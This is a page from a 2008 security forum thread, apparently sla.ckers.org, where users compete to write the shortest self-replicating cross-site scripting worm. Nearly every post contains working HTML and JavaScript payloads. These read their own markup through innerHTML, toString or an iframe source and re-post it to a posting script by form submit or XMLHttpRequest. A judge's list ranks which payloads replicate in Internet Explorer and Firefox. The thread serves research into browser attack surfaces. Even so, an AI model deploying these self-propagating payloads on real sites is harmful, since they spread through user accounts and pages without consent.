Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...23456789101112...LastNext
Current Page: 7 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 04:16PM

With very many props to Sirdarckcat:
151
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>

Works in Firefox 2.0.0.11, doesn't work in IE6.0 ;x, can someone test it in IE7?

Edit: Forgot about FireFox adding stuff again.



Edited 1 time(s). Last edit at 01/05/2008 04:21PM by Spyware.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: shawn
Date: January 05, 2008 04:18PM

This does work without expanding, though:

<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>

Trimmed a few and tested. Unless I missed something else... :-)

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 04:19PM

shawn:

should be 143, but awezome!! u are first place now.

and the obvious one without issues:
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',_[0].value='<form>'+innerHTML.slice(alert('XSS'),152))">

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/05/2008 04:24PM by sirdarckcat.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Alex
Date: January 05, 2008 04:20PM

@shawn: Well, I'm doing a lot of optimization on the codes, but it only gets larger. :D
I've replaced couples of chars with shorter ones, but when it goes to defining all the new variables, it beats me every time ...

---
~~Patching is for suckers~~

http://www.bitsploit.de

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Alex
Date: January 05, 2008 04:25PM

@sirdarckcat:

And where is: _ ? ;)

---
~~Patching is for suckers~~

http://www.bitsploit.de



Edited 1 time(s). Last edit at 01/05/2008 04:25PM by Alex.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 04:27PM

Sorry for this stupid question, but do you have to set name.value and document.body.etc in IE7? Because this:

<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>

Works in FireFox. It's 134 characters, but I have the feeling that IE can't handle this stuff anymore. Since I don't want to install IE7 on my computer, can anyone please test this/tell me if I need name in [name.value] and document in [document.body.etc].

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 05, 2008 04:31PM

<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+parentNode.innerHTML.slice(alert('xss'),132))">

136

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 04:31PM

Alex u r right lol

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 04:33PM

ma1:
I dont know if onfocus is valid..

haha I'll let rsnake decide xD

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 04:38PM

this are the places without numbers

.- ma1 (129) [requires the user to focus a field]
.- Spyware (134) [requires the user to focus a field]
.- shawn (153) <form> (with doctype issues)
.- ma1 (156) <form> (with doctype issues)
.- sirdarckcat (158) (with doctype issues)
.- sirdarckcat (161)
.- ma1 (163) <form>
.- ritz (167) <form>
.- babarianbob (168) <form>
.- .mario (178) <form>
.- Gareth Heyes (229) <form>
.- Matt Presson (233) <form>
.- digi7al64 (266) <form>

the first 4 may not be valid, depends on rsnake

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/05/2008 04:58PM by sirdarckcat.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 04:40PM

Quote
sirdarckcat
or what do you mean?
I was exactly trying to say that :-).
Quote
Spyware
<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>
Very nice, but what if there is another <f.* tagname in front of your code, say the never used FONT ;-) (not even talking about another form or fieldset, I hope it won't be a frame/frameset page because than no single vector given here would work). See the W3C index of elements.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 05, 2008 04:46PM

Just in case...
<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),123))">

129

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 04:52PM

ý<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/ý.*/);alert('xss');submit()"></form>

Which comes down to.. heh.. 134. And this probably won't work in IE7, and I can't remove the damned </form> tag.

Ah well.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 04:57PM

In response to sirdarckcat <form> list, let's make an XMLHttpResponse list too ;-).

- bwb labs (193 bytes) [without Content-Type]
- bwb labs (264 bytes) [with Content-Type]

Haven't seen other stable working versions yet (the one who use function toString's have growing problems on FF).
Here is the long version with Content-Type:
<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: shawn
Date: January 05, 2008 04:58PM

ma1 Wrote:
-------------------------------------------------------
> Just in case...
> <form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),123))">
>
> 129

Well,if we can use events, why not do:

<form><input name="content" onblur="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),122))">

...and drop another byte?

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 05:02PM

I think events like that wont be valid..

.- shawn (128) [requires the user to focus and blur a field]
.- ma1 (129) [requires the user to focus a field]
.- Spyware (134) [requires the user to focus a field]
.- shawn (153) <form> (with doctype issues)
.- ma1 (156) <form> (with doctype issues)
.- sirdarckcat (158) <form> (with doctype issues)
.- sirdarckcat (161)
.- ma1 (163) <form>
.- ritz (167) <form>
.- babarianbob (168) <form>
.- .mario (178) <form>
.- Gareth Heyes (229) <form>
.- Matt Presson (233) <form>
.- digi7al64 (266) <form>

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: shawn
Date: January 05, 2008 05:07PM

sirdarckcat Wrote:
-------------------------------------------------------
> I think events like that wont be valid..

I do agree with that for this exercise, though I can understand the opposing argument.

It just seemed like just as valid an assumption to make: if a user draws focus to an element, the next action they take will draw focus away from that element.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 05:15PM

Unofficial judges:

with doctype
http://loteria-gratis.com.ar/judge1.php
without doctype
http://loteria-gratis.com.ar/judge2.php

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: hallvors
Date: January 05, 2008 05:31PM

Open questions for RSnake:
- can we omit XHR Content-Type header?
- can we omit urlencoding?

Neither of these would be a showstopper for the replication if post.php is a script we control or can make assumptions about - Apache/PHP don't need to parse the posted contents if the target script reads php://stdin or uses a similar method. Of course if we have to support target scripts that use the Apache/PHP $_POST variable parsing both Content-type and (probably, depends on what you post) urlencoding are required.

There are three main issues in this contest:
- how to make the code run (most use script element, img onerror, or various other events)
- how the code can read itself (most - all? - replies rely on innerHTML or function.toString) and what serialization/stringification rules in the UA you must take into account to avoid the code growing
- how to post back to the server (FORM.submit() or XMLHttpRequest are the only options since POST is required)

I contribute two variations nobody explored so far, which I think solves problem 1 and 2 quite elegantly. First a note on Firefox behaviour: for these two examples to work in Firefox it needs a full URL (http://..) and not just post.php. It appears to be a bug in Firefox where a base URL for resolving relative URLs against is missing from JavaScript-generated source. Ideally I'd like that bug not to be held against me :-p and the extra length this problem adds to the code will of course depend on what server you use to test it from so I give the character counts without taking this into account. As posted they don't "work" in Firefox..

Using IFRAME src and FORM post:

<iframe src="javascript:alert('XSS');onload=function(){f[0].value='<iframe src=\x22'+frameElement.src+'\x22>';f.submit()};'<form method=post action=post.php id=f><input name=content>'">

- 185 characters.

Using IFRAME src and XHR - note that I have left out the content-type and urlencoding:

<iframe src="javascript:alert('XSS');with(new top.XMLHttpRequest){open('post','post.php');send('content=<iframe src=\x22'+frameElement.src+'\x22>')}">

- 150 characters.

Awaiting a reply from RSnake on the two questions above and this one:
- if Firefox requires an absolute URL to post.php, can I still submit an entry with a relative URL? If no, what server name should I use?

Hallvord Reiar Michaelsen Steen
http://my.opera.com/hallvors/ http://www.hallvord.com/
+ Browsing with Opera :-) +

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 05:44PM

hallvors
as far as I've tested, your codes doesnt self-replicates.

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 05:51PM

About the judges I made:

Use this one:
http://loteria-gratis.com.ar/judge2.php

Because the judge1 is more strict..

And well, there are several codes that have minor mistakes, because they encode their payload, and you don't need to do that.

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: hallvors
Date: January 05, 2008 06:05PM

sirdarckcat: could you be more specific, how does it fail and in what browser? Tested in IE7 and Firefox 2 (with server name added).

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 06:15PM

Unofficial Jude Result:

Codes tested:
0.- ma1 (136) [requires user to focus a field]
<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+parentNode.innerHTML.slice(alert('xss'),132))">

1.- shawn (153) [doctype issues]
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form id=_>'+innerHTML.slice(alert('XSS'),143))</script>

2.- ma1 (156) [doctype issues]
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>

3.- sirdarckcat (158) [doctype issues]
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.slice(0,148)))</SCRIPT>

4.- bwb labs (168) [DOESNT WORK FOR APACHE NOR IIS]
<script>f=function(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>f="+f+";f()</sc"+"ript>"));};f()</script>

5.- babarianbob (171)
<b><form id="f"><input name="content"><img src="" onerror="with(f)submit(alert('xss'),content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php')"></form></b>

6.- .mario (178) 
<b><img src="m" onerror="alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>

7.- Gareth Heyes (229) [CAN BE REDUCED]
<script>(function(){alert('XSS');document.write('<form method=post action=post.php><input type=image onerror="form.submit()" src><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>')})()</script>

8.- Matt Presson (233) [CAN BE REDUCED]
<script>alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURI(a)+' name=content></form>');body.onload=function(){document.f.submit()}</script>

9.- digi7al64 (266) [CAN BE REDUCED]
<p id=e><script>alert('xss');var d=document;s='script>';p='<form method=post name=f action=post.php><input name=content value="+escape("<p id=e>"+d.getElementById(\'e\').innerHTML+"</p>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");'; eval(p);</script></p>

A.- sirdarckcat (161)
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">

B.- ma1 (163)
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,157)))">

C.- ritz (167)
<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';type=value='<form>'+p.innerHTML.substr(0,161);submit()" type="image">

0(136).- 3 Works on: IE FF(1 and 2) [requires user interaction]
1(153).- 2 Works on: IE FF(2)
2(156).- 2 Works on: IE FF(2)
3(158).- 2 Works on: IE FF(2)
4(168).- 0 Works on: NONE
5(171).- 2 Works on: IE FF(2)
6(178).- 3 Works on: IE FF(1 and 2)
7(229).- 0 Works on: NONE, encoding error
8(233).- 0 Works on: NONE
9(266).- 0 Works on: NONE, encoding error
A(161).- 3 Works on: IE FF(1 and 2)
B(163).- 3 Works on: IE FF(1 and 2)
C(167).- 3 Works on: FF(1 and 2)

So according to theunofficial judges the top are:
0(136).- 3 Works on: IE FF(1 and 2) [requires user interaction]
A(161).- 3 Works on: IE FF(1 and 2)
B(163).- 3 Works on: IE FF(1 and 2)
6(178).- 3 Works on: IE FF(1 and 2)

Because work with any doctype

and the top in the general case:
0(136).- 3 Works on: IE FF(1 and 2) [requires user interaction]
1(153).- 2 Works on: IE FF(2)
2(156).- 2 Works on: IE FF(2)
3(158).- 2 Works on: IE FF(2)
A(161).- 3 Works on: IE FF(1 and 2)
B(163).- 3 Works on: IE FF(1 and 2)
C(167).- 3 Works on: FF(1 and 2) **?
5(171).- 2 Works on: IE FF(2)
6(178).- 3 Works on: IE FF(1 and 2)


Just take in consideration that "0"(one of ma1's codes) requires user interaction.

So.. this is not official..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: hallvors
Date: January 05, 2008 06:16PM

(If you use your PHP script to test it keep in mind that I have not added content-type to the XHR post pending RSnake's response to the question. I assume your PHP script doesn't see the post contents for this reason.)

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 06:16PM

@hallvors:
test your code here:
http://loteria-gratis.com.ar/judge2.php

I understand the issue with the XHR code, but the <form> is also not working

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/05/2008 06:17PM by sirdarckcat.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: hallvors
Date: January 05, 2008 06:22PM

Just tested the <form> version there in IE7, it worked fine. If you test in Firefox you have to change post.php to the full URL to that script, as mentioned in my original post.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 06:25PM

@hallvors:
ah I see, I missed that, sorry
yours is working fine, anyway, adding the length of the url may be an issue.. lets see what rsnake says

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/05/2008 06:26PM by sirdarckcat.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 06:41PM

Ah damned. Forgot the firefox adding stuff thing -again-.

ý<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.match(/ý.*/);" type="submit"></form>

140 Characters.



Edited 4 time(s). Last edit at 01/05/2008 06:51PM by Spyware.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 06:56PM

spyware:
yours doesnt work on IE

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 06:57PM

Blast.

Options: ReplyQuote
Pages: PreviousFirst...23456789101112...LastNext
Current Page: 7 of 20


Sorry, only registered users may post in this forum.